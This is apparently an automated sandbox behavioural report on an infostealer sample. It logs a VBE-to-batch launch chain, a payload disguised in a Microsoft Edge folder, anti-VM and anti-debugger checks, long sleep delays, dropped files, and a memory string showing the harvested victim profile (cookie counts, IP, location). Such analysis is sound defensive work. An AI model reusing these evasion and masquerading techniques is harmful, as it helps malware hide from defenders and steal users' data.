                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 598719
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 598609
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 598500
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 598391
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 598281
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 598125
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 597813
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 3600000
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 597406
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 597016
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 596453
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 596188
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 595969
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 595750
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 595531
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 595250
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 595047
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 594785
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 594578
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 594360
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 594000
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 593688
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 593359
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 593063
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 592594
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 592219
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 591781
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 591422
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 591110
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 590813
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 590406
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 590063
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 589766
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 589500
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 589094
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 588813
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 588281
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 587969
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 587563
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 587328
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 587016
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 586672
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 586250
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 585910
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 585750
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 585594
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 585443
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 585313
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 585188
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 585016
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 584802
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 584672
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 584562
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 584443
                                    Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Window / User API: threadDelayed 6618
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Window / User API: threadDelayed 3009
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Dropped PE file which has not been started: C:\Users\user\Desktop\phDaBATS.log
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe Dropped PE file which has not been started: C:\Users\user\Desktop\odxAFePx.log
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZXODDOCy.log
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hgJAcPUI.log
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xHFppYee.log
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Dropped PE file which has not been started: C:\Users\user\Desktop\otzSQnXU.log
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MyEwMoxX.log
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HZSnKfqJ.log
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xWHHAgmB.log
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PjjNTCHQ.log
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QZsVJdpt.log
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe Dropped PE file which has not been started: C:\Users\user\Desktop\sUnrMbPq.log
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GFbXjJsj.log
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HqZFZAkM.log
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe TID: 7436Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7668Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe; TID: 7872; Thread sleep time: -3600000s >= -30000s
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXE; Last function: Thread delayed
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe; File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe; File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe; Code function: 0_2_00E9A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe; Code function: 0_2_00EAC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe; Code function: 0_2_00EAE6A3 VirtualQuery,GetSystemInfo
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe; Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe; Thread delayed: delay time: 30000
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe; Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe; Thread delayed: delay time: 600000
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe; Thread delayed: delay time: 3600000
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe; File opened: C:\Users\user
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe; File opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe; File opened: C:\Users\user\AppData
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe; File opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe; File opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe; File opened: C:\Users\user\AppData\Local
                                    Source: wscript.exe, 00000001.00000003.1705557953.00000000032CF000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\,
                                    Source: wscript.exe, 00000001.00000003.1705557953.00000000032CF000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2994160012.000000001B1E0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe; API call chain: ExitProcess graph end node graph_0-24883
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe; Process information queried: ProcessInformation
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe; Code function: 0_2_00EAF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe; Code function: 0_2_00EB7DEE mov eax, dword ptr fs:[00000030h]
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe; Code function: 0_2_00EBC030 GetProcessHeap
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe; Process token adjusted: Debug
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe; Process token adjusted: Debug
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe; Code function: 0_2_00EAF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe; Code function: 0_2_00EAF9D5 SetUnhandledExceptionFilter
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe; Code function: 0_2_00EAFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe; Code function: 0_2_00EB8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe; Memory allocated: page read and write | page guard
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainagentComponent\q14QT1c6LK4xpgG0MrqndXYweJYHdEecuYXEv1hUkMNQcqj9DhhAaajtNw.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ChainagentComponent\ChainFontruntimeCrt.exe "C:\ChainagentComponent/ChainFontruntimeCrt.exe"Jump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KC0FFSqemJ.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe "C:\Program Files (x86)\microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe" Jump to behavior
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Application\\117.0.2045.47\\ResiliencyLinks","4Z483_9ES (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2995774902.000000001BAF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Files Count (8c96)":"?","Files Groups (8c96)":"?","Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"550","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.1",0,1,"","user","061544","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\microsoft\\Edge\\Application\\117.0.2045.47\\ResiliencyLinks","4Z483_9ES (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / N
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerH$
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Files Count (8c96)":"?","Files Groups (8c96)":"?","Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"550","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.1",0,1,"","user","061544","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\microsoft\\Edge\\Application\\117.0.2045.47\\ResiliencyLinks","4Z483_9ES (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EAF654 cpuid 0_2_00EAF654
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00EAAF0F
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeQueries volume information: C:\ChainagentComponent\ChainFontruntimeCrt.exe VolumeInformationJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
